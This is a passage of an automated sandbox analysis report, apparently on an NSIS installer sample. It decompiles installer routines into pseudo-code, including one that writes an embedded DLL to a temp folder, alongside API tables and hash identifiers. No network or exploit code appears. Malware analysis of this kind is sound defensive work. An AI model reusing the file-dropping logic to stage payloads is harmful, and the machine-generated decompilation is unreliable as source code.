                                                                              0x004010bd
                                                                              0x004010cc
                                                                              0x004010cf
                                                                              0x004010d5
                                                                              0x004010d9
                                                                              0x004010e4
                                                                              0x004010ed
                                                                              0x004010ef
                                                                              0x004010ef
                                                                              0x00401100
                                                                              0x00401105
                                                                              0x0040110d
                                                                              0x00401110
                                                                              0x00401112
                                                                              0x00401118
                                                                              0x0040111f
                                                                              0x00401126
                                                                              0x00401130
                                                                              0x00401142
                                                                              0x00401156
                                                                              0x00401160
                                                                              0x00401165
                                                                              0x00401165
                                                                              0x00401110
                                                                              0x0040116e
                                                                              0x00000000
                                                                              0x00401178
                                                                              0x00401010
                                                                              0x00401013
                                                                              0x00401015
                                                                              0x0040101f
                                                                              0x0040101f
                                                                              0x00000000

                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                              • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                              • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                              • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 88%
                                                                              			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















                                                                              0x004059e8
                                                                              0x004059ef
                                                                              0x00405a00
                                                                              0x00405a00
                                                                              0x00405a0a
                                                                              0x00405a0c
                                                                              0x00405a13
                                                                              0x00405a1b
                                                                              0x00405a21
                                                                              0x00405a24
                                                                              0x00405a24
                                                                              0x00405bd5
                                                                              0x00405bd5
                                                                              0x00405bd9
                                                                              0x00405bdc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405a31
                                                                              0x00405a37
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405a3d
                                                                              0x00405a3e
                                                                              0x00405a41
                                                                              0x00405bc8
                                                                              0x00405bd2
                                                                              0x00405bd4
                                                                              0x00405bd4
                                                                              0x00405bca
                                                                              0x00405bcc
                                                                              0x00405bce
                                                                              0x00405bcf
                                                                              0x00405bcf
                                                                              0x00000000
                                                                              0x00405bc8
                                                                              0x00405a47
                                                                              0x00405a4b
                                                                              0x00405a5b
                                                                              0x00405a62
                                                                              0x00405a65
                                                                              0x00405a68
                                                                              0x00405a6a
                                                                              0x00405a6d
                                                                              0x00405a70
                                                                              0x00405a71
                                                                              0x00405a75
                                                                              0x00405a78
                                                                              0x00405b73
                                                                              0x00405b77
                                                                              0x00405ba7
                                                                              0x00405bab
                                                                              0x00405bb0
                                                                              0x00405bb4
                                                                              0x00405bb4
                                                                              0x00405bb9
                                                                              0x00405bbf
                                                                              0x00405bc1
                                                                              0x00000000
                                                                              0x00405bc1
                                                                              0x00405b79
                                                                              0x00405b7c
                                                                              0x00405b91
                                                                              0x00405b98
                                                                              0x00405b7e
                                                                              0x00405b85
                                                                              0x00405b85
                                                                              0x00405ba0
                                                                              0x00405ba3
                                                                              0x00405b6b
                                                                              0x00405b6c
                                                                              0x00405b6c
                                                                              0x00000000
                                                                              0x00405ba3
                                                                              0x00405a7e
                                                                              0x00405a82
                                                                              0x00405a87
                                                                              0x00405a88
                                                                              0x00405a8b
                                                                              0x00405a96
                                                                              0x00405a99
                                                                              0x00405a9c
                                                                              0x00405ab5
                                                                              0x00405ab8
                                                                              0x00405ae5
                                                                              0x00405ae8
                                                                              0x00405af8
                                                                              0x00405afb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405b03
                                                                              0x00000000
                                                                              0x00405b03
                                                                              0x00405af0
                                                                              0x00000000
                                                                              0x00405af0
                                                                              0x00405aca
                                                                              0x00405acf
                                                                              0x00405ad2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405ade
                                                                              0x00000000
                                                                              0x00405a9e
                                                                              0x00405aae
                                                                              0x00405b09
                                                                              0x00405b09
                                                                              0x00405b0c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405b0c
                                                                              0x00405a8d
                                                                              0x00405a8d
                                                                              0x00405b0e
                                                                              0x00405b0e
                                                                              0x00405b15
                                                                              0x00405b19
                                                                              0x00405b19
                                                                              0x00405b1a
                                                                              0x00405b1d
                                                                              0x00405b29
                                                                              0x00405b2f
                                                                              0x00405b31
                                                                              0x00405b50
                                                                              0x00405b50
                                                                              0x00000000
                                                                              0x00405b50
                                                                              0x00405b37
                                                                              0x00405b40
                                                                              0x00405b43
                                                                              0x00405b48
                                                                              0x00405b4c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405b53
                                                                              0x00405b53
                                                                              0x00405b53
                                                                              0x00405b57
                                                                              0x00405b5a
                                                                              0x00405b5c
                                                                              0x00405b60
                                                                              0x00405b66
                                                                              0x00405b66
                                                                              0x00405b60
                                                                              0x00000000
                                                                              0x00405b5a
                                                                              0x00405a8b
                                                                              0x00405be2
                                                                              0x00405bec
                                                                              0x00405bf8
                                                                              0x00405bf8
                                                                              0x00000000

                                                                              APIs
                                                                              • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                              • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                              • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                              • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078EF38,00789938), ref: 00405BBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                              • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 4227507514-3711765563
                                                                              • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                              • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                              • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                              • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 32%
                                                                              			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                                                              0x004026fb
                                                                              0x00402707
                                                                              0x0040270a
                                                                              0x00402711
                                                                              0x00402712
                                                                              0x00402737
                                                                              0x0040273c
                                                                              0x00402714
                                                                              0x00402719
                                                                              0x0040271a
                                                                              0x0040271a
                                                                              0x00402742
                                                                              0x0040274f
                                                                              0x00402757
                                                                              0x0040275a
                                                                              0x00402760
                                                                              0x0040276e
                                                                              0x00402773
                                                                              0x00402777
                                                                              0x0040277a
                                                                              0x00402783
                                                                              0x0040278f
                                                                              0x00402793
                                                                              0x00402796
                                                                              0x00402798
                                                                              0x0040279b
                                                                              0x0040279c
                                                                              0x0040279d
                                                                              0x004027a0
                                                                              0x004027bf
                                                                              0x004027ac
                                                                              0x004027b4
                                                                              0x004027b7
                                                                              0x004027bc
                                                                              0x004027bc
                                                                              0x004027c6
                                                                              0x004027c6
                                                                              0x004027d8
                                                                              0x004027df
                                                                              0x004027e5
                                                                              0x004027e6
                                                                              0x004027e7
                                                                              0x004027ea
                                                                              0x004027f1
                                                                              0x004027f1
                                                                              0x004027f7
                                                                              0x004027fd
                                                                              0x004027fd
                                                                              0x00402807
                                                                              0x00402808
                                                                              0x0040280c
                                                                              0x0040280e
                                                                              0x00402814
                                                                              0x00402814
                                                                              0x0040281b
                                                                              0x004021e8
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                              • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                              • GlobalFree.KERNEL32 ref: 004027C6
                                                                              • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                              • GlobalFree.KERNEL32 ref: 004027DF
                                                                              • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                              • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 3508600917-1998957182
                                                                              • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                              • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                              • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                              • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                              0x00404d68
                                                                              0x00404d74
                                                                              0x00404d77
                                                                              0x00404d7d
                                                                              0x00404d89
                                                                              0x00404d8c
                                                                              0x00404d8f
                                                                              0x00404d95
                                                                              0x00404d95
                                                                              0x00404d9b
                                                                              0x00404da3
                                                                              0x00404da6
                                                                              0x00404dc3
                                                                              0x00404dc7
                                                                              0x00404dd0
                                                                              0x00404dd0
                                                                              0x00404dda
                                                                              0x00404de3
                                                                              0x00404def
                                                                              0x00404df6
                                                                              0x00404dfa
                                                                              0x00404dfd
                                                                              0x00404e10
                                                                              0x00404e1e
                                                                              0x00404e1e
                                                                              0x00404e22
                                                                              0x00404e24
                                                                              0x00404e27
                                                                              0x00000000
                                                                              0x00404e27
                                                                              0x00404da8
                                                                              0x00404db0
                                                                              0x00404db8
                                                                              0x00404dbe
                                                                              0x00000000
                                                                              0x00404dbe
                                                                              0x00404db8
                                                                              0x00404da6
                                                                              0x00404e31

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                              • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                              • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                              • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: `y
                                                                              • API String ID: 2531174081-1740403070
                                                                              • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                              • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                              • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                              • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                              0x00405bfd
                                                                              0x00405c05
                                                                              0x00405c19
                                                                              0x00405c19
                                                                              0x00405c1f
                                                                              0x00405c2c
                                                                              0x00405c2c
                                                                              0x00405c2d
                                                                              0x00405c2f
                                                                              0x00405c33
                                                                              0x00405c35
                                                                              0x00405c3e
                                                                              0x00405c40
                                                                              0x00405c5a
                                                                              0x00405c62
                                                                              0x00405c62
                                                                              0x00405c67
                                                                              0x00405c69
                                                                              0x00405c6b
                                                                              0x00405c6f
                                                                              0x00405c70
                                                                              0x00405c73
                                                                              0x00405c7b
                                                                              0x00405c7d
                                                                              0x00405c81
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405c87
                                                                              0x00405c8c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405c8c
                                                                              0x00405c91

                                                                              APIs
                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                              • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                              • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
